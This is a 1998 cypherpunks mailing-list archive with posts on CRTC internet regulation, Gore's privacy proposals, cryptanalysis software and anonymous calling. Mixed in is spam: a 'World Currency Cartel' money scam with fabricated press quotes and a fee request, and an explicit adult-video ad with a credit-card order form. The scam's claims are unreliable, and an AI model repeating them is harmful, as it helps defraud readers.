	http://www.crtc.gc.ca/ENG/NEWS/RELEASES/1998/R980731e.htm

	(press release)


	http://www.crtc.gc.ca/ENG/bcasting/notice/1998/p9882_0.txt

	(public notice in English)

All EFC members should write and say they are opposed to CRTC regulation.

Unfortunately, I am scheduled to leave for vacation tomorrow, but David
Jones will post this and perhaps suggest some sample letters to write
to the CRTC.

EFC will plan to attend the public hearings on the issue on November 23
in Hull, Quebec.  

Jeffrey Shallit





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Sun, 2 Aug 1998 18:55:15 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Fake fondler found out/Miss suckerator '98
Message-ID: <19980802081100.24689.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/2/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sahazali@ew.mimos.my
Date: Sun, 2 Aug 1998 00:24:35 -0700 (PDT)
To: sahazali@ew.mimos.my
Subject: Find out what "They" don't want you to know!!!
Message-ID: <01658742211308922@g_hipkernia.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Friend:

If you have already responded to the following announcement a few
days ago, that means your package is already on its way and it
should be arriving soon! If you have not responded to this before,
please pay attention to it now. This is very important!!!

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 
IMPORTANT ANNOUNCEMENT
IMPORTANT ACCOUNCEMENT
 '''''''''''''''''''''''''''
'''''''''''''''''''''''''''''
 '''''''''''''''''''''''''''
Your future May Depend on it !
 
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 
Before you know about this 'Important Announcement', you must
first read the following 'Editorial Excerpts' from some important
publications in the United States:

NBC NIGHTLY NEWS: "Members of 'World Currency Cartel', who 
always keep a low profile, are considered to be some of the most
wealthiest people in North America".

 "In concluding our review of Financial organizations to effect 
change in the 90's, special attention should be called to a California based 
organization, 'WORLD CURRENCY CARTEL'. Members of this 
organization are amassing hundred of millions of dollars in the currency 
market using a very LEGAL method which has NEVER been divulged to 
the general public.  While their purpose is not yet known, their presence 
has most certainly been felt".
 

More excerpts later, but first let us give you this very
'IMPORTANT ANNOUNCEMENT":
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

We are glad to announce that for the first time and for a very
short period of time, WORLD CURRENCY CARTEL will instruct a
LIMITED number of people worldwide on 'HOW TO CONVERT $25 INTO ONE
HUNDRED OF LEGAL CURRENCY'. We will transact the first conversion
for you, after that you can easily and quickly do this on your own
hundreds or even thousands of times every month.
TAKE ADVANTAGE OF THIS "SECRET FLAW" !
******************************************************************
******************************************************************

 
It is even more explosive than we have yet disclosed. While
currency does fluctuate daily, we can show you 'HOW TO CONVERT $99
INTO $588 AS MANY TIMES AS YOU WANT'. That means, you will be able
to EXCHANGE $99, AMERICAN LEGAL CURRENCY DOLLARS, FOR $580 OF THE
SAME. You can do this as many times as you wish, every day, every
week, every month. All very LEGAL and effortlessly!
 
It takes only 5 to 10 minutes each time you do this. You can do
this from home, office or even while traveling. All you need is
an access to a phone line and an address. Best of all, you can do
this from ANY CITY ON THIS EARTH!!!
 
Again, we must reiterate, anyone can do this and the source is
NEVER-ENDING. For as long as the global financial community
continues to use different currencies with varying exchange rates,
the "SECRET FLAW" will exist.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>
As we said earlier , we will do the first transaction for you and
will show you exactly how to do this on your own, over and over
again!
 
The amount of exchange you would do each time is entirely up to
you. Working just 2 to 10 hours a week, you can soon join the list
of Millionaires who do this on a daily basis many times a day. The
transaction is so simple that even a high school kid can do it!
 
We at the World Currency Cartel would like to see a uniform global
currency backed by Gold. But, until then, we will allow a LIMITED
number of individuals worldwide to share in the UNLIMITED PROFITS
provided for by the world currency differentials.
 
We will espouse no more political views nor will we ask you to do
so. We can say however, that our parent organization, NDML,
benefits greatly by the knowledge being shared, as we
ourselves, along with YOU, benefit likewise. Your main concern
surely will be, how you will benefit.

As soon as you become a member, you will make transactions from
your home, office, by telephone or through the mail. You can
conduct these transactions even while traveling.

Don't believe us? Experience it for yourself!
  ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Unlike anyone else, we will assure you great financial freedom and
you will add to our quickly growing base of supporters and join
the list of MILLIONAIRES being created using this very "SECRET
FLAW" in the world currency market.
******************************************************************
******************************************************************


DON'T ENVY US, JOIN US TODAY!!!
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

There is a one time membership fee of only $195. BUT, if you join
us by Aug 15th, 1998, you can join us for only $25 administrative cost. 
Your important documents, instructions, contact name/address, phone
number and all other pertinent information will be mailed to you
immediately. So take advantage and join us today.
 
(If you are replying after Aug 15th, you must pay $195.00 for
the membership fee. NO EXCEPTIONS, and no more E-mail inquiries
please).

Upon becoming a member, you promise to keep all infos
CONFIDENTIAL!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~
Should you choose to cancel your membership for any reason, you
must return all papers/documents for a refund within 60 days.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~--
 
IMPORTANT:
****************
 
1...Please write your name & mailing address VERY CLEARLY on a
     paper
2...Below your mailing address, please write your E-mail address
3...At the top left hand corner, please write the words "NEW
     MEMBER" 
4...Attach a CHECK or MONEY ORDER for $25 + $10 for the shipping 
     and handling of documents (TOTAL = $35.00)  Outside US add $10 (TOTAL  = $45) 
     PAYABLE TO "EBSN" and mail to:

                  
                    EBSN
                    PO BOX 66
                    ROSELLE PARK, NJ 07204
                 
 
}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}} }}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}

Here are some more 'Editorial Excerpts':
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WALL STREET: "A discreet group of Americans, operating under the
guise of World Currency Cartel have recently begun making rumbles in
world finance market. While at this time, their game is not completely
known, they certainly will be watched by those making major moves in the
currency contracts".

FINANCIAL WEEK: "Watch them, monitor them, extract their knowledge
and try to become one of them. That is the soundest financial
advice we could give to anyone".

NATIONAL BUSINESS WEEKLY: "While this reporter has been left in
the cold as to its method of operation, we have been able to
confirm that 'World Currency Cartel' and its members are literally
amassing great fortunes overnight".

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$END$$$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$.
 We thankfully credit DIAMOND INT. for the content of this
 IMPORTANT ANNOUNCEMENT.
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@m7.sprynet.com>
Date: Sun, 2 Aug 1998 14:02:44 -0700 (PDT)
To: cypherpunks@toad.com
Subject: commercial cryptanalysis software
Message-ID: <3.0.5.32.19980802133653.007c5e90@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain


	
http://www.dgsciences.com/codeclas.htm

Seems to be commercial TLA tools.



honig@alum.mit.edu

   "Speech is not protected simply because it is written in a language"	
	Federal Misjudge Gwin on the Bernstein Case









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Count of Monte Carlo" <catrancher@hotmail.com>
Date: Sun, 2 Aug 1998 13:59:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Enough to make you puke: gore on privacy
Message-ID: <19980802205852.8900.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



`one of the worst things to happen to privacy since Alan Funt'






Friday July 31 12:24 PM EDT 

Gore Seeks New Web Privacy Laws

TED BRIDIS Associated Press Writer



WASHINGTON (AP) - Calling privacy a ``basic American value,'' Vice 
President Al Gore pressed today for new federal laws to prevent 
companies from collecting personal information from children who use 
Internet Web sites, chat rooms and e-mail. 

Among its first steps toward crafting an ``Electronic Bill of Rights,'' 
the Clinton administration also wants to suspend plans to assign every 
American a health-care ID number and proposed a new role for the Office 
of Management and Budget in writing privacy rules. 

Gore said citizens' rights to decide whether to allow companies to 
collect personal information, dictate what type of data is collected and 
review it for accuracy ``do not have sufficient protections by a long 
shot.'' 

Gore, who first described such a bill of rights in May, pressed for new 
laws against identity fraud and for new protections of consumer credit 
reports. 

``Privacy is a basic American value, in the information age and in every 
age,'' Gore said. ``It must be protected. We need an electronic bill of 
rights for this electronic age.'' 

Gore said the announcements ``will make technology consistent with 
America's oldest values.'' 

Privacy has become a politically popular issue, amid growing concern 
among Americans about high-tech intrusions into their personal lives. 

``We're beginning to see the flesh put on the bones,'' said Deirdre 
Mulligan, a privacy specialist at the Center for Democracy and 
Technology in Washington. ``These are very specific proposals that 
respond to issues that advocates and the public have raised.'' 

Critics have complained about a 1996 law that would assign everyone a 
computer number to track health care from birth to death, noting that it 
allows insurance companies, doctors, drug stores and others to release 
medical records for broadly defined ``health care operations.'' 

Gore today called it ``one of the worst things to happen to privacy 
since Alan Funt,'' who created the ``Candid Camera'' television series. 

``It appears the White House is at least beginning to take privacy 
seriously,'' said Barry Steinhardt, president of the Electronic Frontier 
Foundation, a civil liberties group. He called it ``a very important 
step that significantly improves the outlook for medical privacy.'' 

Children on the Internet would find new protections under Gore's plans. 

Federal regulators said this summer that many companies collect personal 
information from children online, sometimes asking for their names and 
e-mail addresses - even questions about their personal finances - using 
animated characters or as an incentive to join a contest or play a game. 

``You don't do business with an 11-year-old without parental consent,'' 
said Robert Pitofsky, chairman of the Federal Trade Commission, which 
already has asked Congress for new laws limiting how Web sites collect 
information from kids. 

``The information that is requested on these Web sites appears to be so 
innocent, very harmless,'' said Sen. Richard Bryan, D-Nev., who 
introduced a bill that would require companies to obtain a parent's 
permission before they collect information from children under 12. ``But 
they do invade a family's privacy and raise safety concerns.'' 

The White House is not calling for relaxed restrictions on powerful 
data-scrambling technology, called encryption, which helps keep e-mail 
and other messages confidential but also can be used by criminals. 

``On the main privacy issues, the ones that confront the country today, 
the administration is still reluctant to make the hard decisions,'' said 
Marc Rotenberg, executive director of the Electronic Privacy Information 
Center, which has lobbied for broader use of encryption. 

The administration also is pledging its support for the online industry 
to find ways to better protect the privacy of adults on the Web, such as 
recent efforts by the Online Privacy Alliance, a newly formed group of 
50 companies and trade groups that include Microsoft, America Online and 
IBM. 

Gore recently warned computer industry executives that if 
self-regulation does not work, ``we will be obliged to take action 
ourselves.'' The FTC told Congress it should pass tough new privacy laws 
for adults if the industry's own efforts do not improve by year's end. 

Advocates generally praised plans for the new federal privacy office, 
but noted that OMB - the new office's parent agency - has itself been 
criticized for failing to enforce existing federal privacy laws. 



______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Mon, 3 Aug 1998 06:24:09 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Fake fondler found out/Miss suckerator '98
Message-ID: <19980802151300.21971.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/2/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: windy <windy@gloryroad.net>
Date: Sun, 2 Aug 1998 20:25:19 -0700 (PDT)
To: cypherpunks@toad.com
Subject: pcanywhere
In-Reply-To: <199808011921.PAA06390@dewdrop2.mindspring.com>
Message-ID: <35C4F428.693E540D@gloryroad.net>
MIME-Version: 1.0
Content-Type: text/plain


    I was wondering if any of you could help me find a copy of a great
little program called PcAnywhere....

any help and/or comments would be appreciated...

loner





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 2 Aug 1998 23:39:38 -0700 (PDT)
To: windy <cypherpunks@toad.com
Subject: Re: pcanywhere
In-Reply-To: <199808011921.PAA06390@dewdrop2.mindspring.com>
Message-ID: <3.0.5.32.19980802233729.00c43140@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:20 PM 8/2/98 +0000, windy wrote:
>    I was wondering if any of you could help me find a copy of a great
>little program called PcAnywhere....
>
>any help and/or comments would be appreciated...

It's a commercial program - try Egghead.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Mon, 3 Aug 1998 07:33:55 -0700 (PDT)
To: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Subject: Re: question...
In-Reply-To: <199807310655.IAA08821@replay.com>
Message-ID: <3.0.5.32.19980803003232.008ce720@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain


At 05:18 PM 03 08 98 +0800, Bernardo B. Terrado wrote:
>I tried to access the document but
>I only got an error message.
>
>Is it still online?
>
>The file....  GTMHH1-4.html     is it 1 or  l(letter).

Is WHAT 1 or l(letter)?
You didn't provide a 	Utterly
				Rancid
				Location

that a trouble shooter could use to trouble shoot your difficulty.
You must be a,,,,,, a,,,,,,, a,,,,,, a CypherPunk.

Reeza!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "kryz" <chrisharwig@hetnet.nl>
Date: Mon, 3 Aug 1998 07:54:52 -0700 (PDT)
To: "Siferpunqs" <cypherpunks@toad.com>
Subject: Fw: commercial cryptanalysis software
In-Reply-To: <3.0.5.32.19980802133653.007c5e90@m7.sprynet.com>
Message-ID: <MAPI.Id.0016.0072797a202020203030303430303034@MAPI.to.RFC822>
MIME-Version: 1.0
Content-Type: text/plain


That's devastating!
Let me add a little point to this (see === below):

----------
: Date: zondag 2 augustus 1998 20:36:53 
: From: David Honig
: To: Ciferpunqs
: Subject: commercial cryptanalysis software
: 
: 	
: http://www.dgsciences.com/codeclas.htm
: 
: Seems to be commercial TLA tools.
: 
: 
: 
: honig@alum.mit.edu
: 
:    "Speech is not protected simply because it is written in a language"	
=== .. .. ... ...			language." (That's the point...)
: 	Federal Misjudge Gwin on the Bernstein Case






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Cook <jimcook@panix.com>
Date: Mon, 3 Aug 1998 01:18:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RFC re simple anti-censorship strategy
Message-ID: <3.0.3.16.19980803041803.483765ba@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


(copy posted to alt.cypherpunks)

Motivated by Chiquita's recent censorship of the Cincinnati Inquirer -- and
more generally by the challenge of making suppressed documents available on
the web without exposing webmasters or their ISPs to legal liability --
I've developed a simple strategy.  The approach is similar to Adam Back's
Eternity Service in that it combines anonymous posts to Usenet with a
news-to-web interface.  Unlike Adam's approach, posts are not encrypted --
and are therefore easier to find and cancel.  OTOH, this approach is
easier, and does not require root privileges, to implement

Please see <http://www.panix.com/~jimcook/ntw-test.html> for the
demonstration.  I welcome comments.


Jim Cook <jimcook@panix.com>
Consulting in the Public Interest <www.cipi.com>
Home <www.panix.com/~jimcook>
Info re Globalization <www.panix.com/~jimcook/globalization/>
PGP Public Key <www.panix.com/~jimcook/PGP_Public_Key.html>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patti468@hotmail.com
Date: Mon, 3 Aug 1998 02:36:51 -0700 (PDT)
Subject: Don't Miss These!
Message-ID: <QQfauw27229.199808030935@relay2.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Attention!
Warning! Adults Only!                    Warning! Adults Only!

If you are under 21 years of age, or not interested in sexually 
explicit material... please hit your keyboard delete button now
and please excuse the intrusion.  To REMOVE your name from our email list, simply send us email with REMOVE in the subject line.  You need not read any further!

Available NOW for only $9.95!  Next 10 Days Only!

WORLD RECORD SEX!

Be There!  See It Now On Video!  Unbelievable ...But True!

You Won't Believe Your Eyes!!!  [As Seen on the Howard Stern Show]

"The World's Biggest Gang Bang"

See sexy  Annabel Chong as she sets the world Gang Bang Record
in this fantastic video documentary that chronicles her 24 hour
sexathon with 251 men engaging in sexual intercourse and oral
sex with her!  Don't worry, you won't have to stay up 24 hours
to watch it all.  We've selected only the most exciting and red
hot scenes for you...all in breathtaking living color with plenty of
extreme close-ups!  This video is guaranteed to knock your socks
off and leave you breathless!  You've never seen anything like it!
Annabel takes on five men at a time!  90 minutes! Order Today!
Only $9.95 plus $3 shipping and handling [Total $12.95].


"GANG BANG II"
The Record Breaker!!!  Starring Jasmin St. Claire!

See Beautiful and Voluptious Jasmin St. Claire shatter Annabel's
gang bang record by taking on 300 men in one 24 hour sex session!
You won't believe your eyes at all the hot firey action that you will
see as the new world record is established before your eyes as
Jasmin  takes on five men at a time for sexual intercourse and
oral sex!  Your friends will break down your door to see this video!
You'll be the most popular guy in town!  The action is truly unreal 
and you will see the best of it in living life-like color!  Order Today
and see Jasmin break the record!  90 minutes.  Only $9.95 plus
$3 shipping and handling [total $12.95].

Also Available...

The Uncensored Authentic Underground...
Pamela Anderson Lee & Tommy Lee
Sex Video Tape!

Everyone is talking about this exciting video!  See Pam and 
Tommy engaging in sexual intercourse and oral sex in the car,
on the boat and much, much more!  A  real collectors video! 30 minutes.
Only $9.95 plus $3 shipping and Handling [total $12.95]

"Tonya Harding Wedding Night Sex Video"
Now see the beautiful Ice Skating Shame of the Olympics
Tonya Harding engaging in sexual intercourse and oral 
sex on her wedding night with husband Jeff Gillooly!
This "Bad Girl" is Hot!  Don't miss this video! 30 minutes.
Only $9.95 plus $3 shipping and handling [total $12.95]

"Traci...I Love You"  Starring Traci Lords
Now see the most beautiful and popular porn star in her last
adult video before she hit the big time!  It's the blockbuster of
the year...sensual...fiery and exposive!  Traci Lords in her most
erotic and controversial film ever!  Don't Miss It!  90 minutes.
Only $9.95 plus $3 shipping and handling [total $12.95]

EMAIL SPECIAL!

ORDER ANY FOUR VIDEOS AND GET THE FIFTH ONE FREE!!!

Your order will be shipped via First Class Mail. All Shipments in plain unmarked wrapper.
For Priority Mail - Add $5
For Overnight Express - add $15

You can order by Phone, Fax, Mail or Email.

We accept all Major Credit Cards and checks by phone or fax.
Visa - MasterCard - American Express - Discover

10 Day Money Back Guarantee!  We know that you will be pleased with these Videos!

To Email your order - DO NOT HIT REPLY ON YOUR KEYBOARD

Send email to our special email address below:

jojo369@juno.com

[Note: If you order by email and do not receive an email acknowledgement within 24 hours, please phone our office at
718-287-3800]

Phone our office 9am to 10 pm [eastern time]

[718] 287-3800 to Order By Phone for FASTEST SERVICE!

 We can accept your credit card or check by phone

Fax Your Order 24 hours per day  to  [718] 462-5920
You can fax your credit card information or your check

Order by mail by sending $12.95 per video,  cash, check, money order or major credit card [Visa, MasterCard, American Express or Discover] to

TCPS, INC.
4718  18th Ave.  Suite 135
Brooklyn, NY 11204

Make Checks & Money Orders Payable to TCPS, Inc.
New York State Residents Please Add 85 cents for Sales Tax per Video!

You must be over 21 years of age to order and give us your date of birth with your order!

The Following Order Form is for Your Convenience!

.............................................................................................................




Please ship me the following video tape[s]!

Qty___________Annabel Chong "World's Biggest Gang Bang"

Qty__________"Gang Bang II" Jasmin St. Claire

Qty___________"Pamela & Tommy Lee Sex Video Tape"

Qty_________   "Tonya Harding Wedding Night Sex Video Tape"

Qty__________"Traci I Love You" Traci Lords

at $9.95 each plus $3.00 for shipping and handling per tape
[$12.95 per video or "SPECIAL $51.80 for ALL FIVE"!

Credit Card #______________________________Exp Date___

I hereby represent that I am over 21 years of age.  
My date of birth is_________________________________

Signature______________________________________________

Ship to:  Name_______________________________________

Address____________________________________________

City________________________State___________Zip________

Area Code and Home Phone  [    ]___________________________

Fax # [     ]______________________________________________

Email Address___________________________________________

To remove your name from our mailing list, send us an email with 
remove in the subject line.  This is a one time offer and you should not hear from us again!

FOREIGN ORDERS -Add $15us if you desire Air Parcel Post Shipment.  We ship all over the world.

By deleting your unwanted E-Mail you waste one keystroke, yet
by throwing away paper mail you waste our planet!  SAVE THE
TREES and support internet E-Mail instead of paper mail!

[C] Copyright TCPS 1998














































































From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Mon, 3 Aug 1998 23:21:37 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Angry stripper pees on punter/Girlz Toyz/Topless teens
Message-ID: <19980803080000.25399.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/3/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ZeroInt <zeroint@birmingham.crosswinds.net>
Date: Mon, 3 Aug 1998 07:23:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: commercial cryptanalysis software
In-Reply-To: <3.0.5.32.19980802133653.007c5e90@m7.sprynet.com>
Message-ID: <199808031423.HAA07894@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Speaking of which,

I have been trying to find some cryptanalisys software for a while now, but no
luck.  Does anyone have a url for me?

Regards 
PGP Fingerprints:
99EB 330B B517 F5A3  CDD3 875D CDB6 8621 - 0x2A47CAAF
BCBF 8B61 551E 4A75 C3A7  9192 C158 0774 EB5A 746D - 0xEB5A746D

PGP encrypted mail preferred 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Storey <cognitus@earthlink.net>
Date: Mon, 3 Aug 1998 09:06:29 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Anonymous phone calls
In-Reply-To: <D104150098E6D111B7830000F8D90AE8017943@exna02.securitydynamics.com>
Message-ID: <35C5E0C7.CEF4F93D@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


Trei, Peter wrote:
> 
>         Bill Stewart [SMTP:bill.stewart@pobox.com] wrote:
> 
>         >At 05:49 PM 8/2/98 -0700, scoops wrote:
>         >>Would some one be kind enough to suggest anonymous phone
>         >>call services?
>         >>I know about some supposedly untraceable 900# at $3.95 per
>         >>minute.  What about an anonymous prepaid service 800# or a
>         >>calling card.
> 
>         >Sure - there's a much cheaper, easier approach.  Go buy a
>         >phone card.  There are some phone cards that insist on being
>         >recharged by credit card, but there are lots that you can
>         >buy at your local convenience store that don't insist on it,
>         >and the ones at ethnic grocery stores which let you call
>         >Mexico or China at moderately outrageous rates are more
>         >likely to be cash-only.  Or you can go to your airport (if
>         >you're not too paranoid about Them watching you :-) and buy
>         >phone cards like The Official San Francisco Phone Card, in
>         >return for US$20 bills.
> 
>         At about the same effort, you can be even more secure. Use
>         cash.  Change your $20 bill for a couple rolls of quarters
>         and walk up to any pay phone that takes coins. Put in a
>         quarter, and dial your number. You'll hear something like
>         'Please insert $3.50 for the first three minutes.' Shove in
>         the coins, and talk. Works fine for long distance as well as
>         local calls. Much cheaper than the 900#.
> 
>         If you use a calling card for more than a single call, those
>         calls can be linked to each other. It may also be possible
>         to trace where the card was sold.
> 
>         Peter Trei
>         ptrei@securitydynamics.com


Also, even the private-switch operations selling cash-paid calling cards
have records of the calls made on their systems, though those records
might not be in a form that makes them readily linkable to the orginator
of a given call--it all depends on how much it's worth to the pursuer to
pursue you.

Richard Storey




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph 'Anonymous' Howe" <nobody@privacy.nb.ca>
Date: Mon, 3 Aug 1998 08:54:48 -0700 (PDT)
To: cypherpunks@toad.com
Subject: none
Message-ID: <8137729480121adbaf72c2ba4324be17@privacy.nb.ca>
MIME-Version: 1.0
Content-Type: text/plain



Yea, well that's been a problem for years now, which makes it no less relevant today, but it's hardly news.

The author calls this condition at state of war.  He's quite right.  If the tyrant has any opposition it's
from the criminal class, with the liberty squad standing mainly on the side lines giving an occassional 
muffled cheer and sometimes looking on to see what kind of tactics are being used by the crooks with hopes
that they might learn some tactics they were not brave enough to employ themselves.

I do not, however, know of any war waged successfully where the opposition is as scattered as the liberty crowd is,
therefore, it is being waged on an individual basis with technology, stealth, and the occassional
government that has yet to bend its knee to Uncle Sammy (which, by the way, are becoming fewer, not more).
        







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Mon, 3 Aug 1998 12:41:23 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 3, 1998
Message-ID: <199808031928.OAA29890@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

A new multi-billion dollar industry is here! 
Be at CTIA's WIRELESS I.T. '98
where personal computing and communications converge!

Don't Miss Your Chance -- October 12-14, 1998
Bally's Las Vegas, Las Vegas, NV

For more information, visit http://www.wirelessit.com 
===========================================

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nina Huupponen <Nina.Huupponen@DataFellows.com>
Date: Mon, 3 Aug 1998 05:50:11 -0700 (PDT)
To: F-Secure-Press-Global@DataFellows.com
Subject: Data Fellows introduces F-Secure NameSurfer version 2.0
Message-ID: <3.0.3.32.19980803150022.00b3bbd0@smtp.datafellows.com>
MIME-Version: 1.0
Content-Type: text/plain


For immediate release
3 August 1998

DATA FELLOWS INTRODUCES F-SECURE NAMESURFER VERSION 2.0

Helsinki, Finland, August 3rd, 1998 -- Data Fellows, the global leader in
Internet security solutions, has today announced F-Secure Namesurfer 2.0, a
new version of its DNS (Domain Name System) management tool.  

DNS translates host names to IP addresses, which makes it a critical
component of IP-based networks. F-Secure NameSurfer provides network
managers with an easy-to-use Web interface for DNS administration, saving
time and maintenance resources. Its intuitive graphical user interface and
automatic error checking prevent network managers from generating faulty
DNS data. Faulty DNS data can bring down an entire IP network, so accurate
DNS data is essential for reliable and secure intranets and Internet. 

F-Secure NameSurfer 2.0 has been extensively restructured to achieve
peerless performance, especially in large DNS installations. 

The new version can prevent a network manager from creating records with IP
addresses that fall outside his own network. Thus, ISPs can grant their
customers permission to change addresses, with the assurance that customers
will stay within their own network zone.

F-Secure NameSurfer provides significant savings in network management. The
intuitive interface reduces the time needed to create DNS configurations.
The configurations can be done remotely and by several network managers
with personal administration rights. Routine tasks can be delegated to
clerical staff. Ultimately, even end-users and ISP customers can manage
their own DNS data, using a Web browser. 

Prime target customers for F-Secure Name Surfer are telecommunication
operators, Internet Service Providers (ISPs), and other organizations that
need the best tool in the market to manage Internet or intranet security.
NameSurfer users include ISPs (such as US WEST !NTERACT, Concentric Network
Corp., and FUNET - the Finnish University and Research Network), and
international corporations (such as Barclays Bank PLC, Motorola, and
UPM-Kymmene). 

